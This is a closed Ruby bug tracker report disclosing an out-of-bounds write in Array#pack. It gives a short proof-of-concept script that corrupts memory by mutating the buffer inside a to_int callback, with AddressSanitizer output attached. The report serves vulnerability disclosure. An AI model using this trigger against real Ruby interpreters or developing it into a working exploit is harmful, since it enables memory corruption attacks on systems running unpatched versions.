Project

General

Profile

Actions

Bug #22337

closed

OOB write in array.pack()

Bug #22337: OOB write in array.pack()

Added by danielchong (Daniel Chong) 2 days ago. Updated about 11 hours ago.

Status:
Closed
Assignee:
-
Target version:
-
[ruby-core:126784]

Description

Hi, I found a case that causes an oob write in array.pack()

PoC:

buf = "Z" * 4096
$buf = buf
evil = Object.new
def evil.to_int
  $buf.replace("q")    
  123456789            
end
[evil].pack("r", buffer: buf)

asan output (truncated):

==ERROR: AddressSanitizer: use-after-poison ... WRITE of size 1
    #0 bary_pack            bignum.c:911
    #1 rb_integer_pack      bignum.c:3673
    #2 pack_pack            pack.c:800            <- write at RSTRING_PTR(res)+stale_start
    #3 vm_opt_newarray_pack_buffer  vm_insnhelper.c:6632
Address ... is a wild pointer inside of access range of size 0x1.
Actions

Also available in: PDF Atom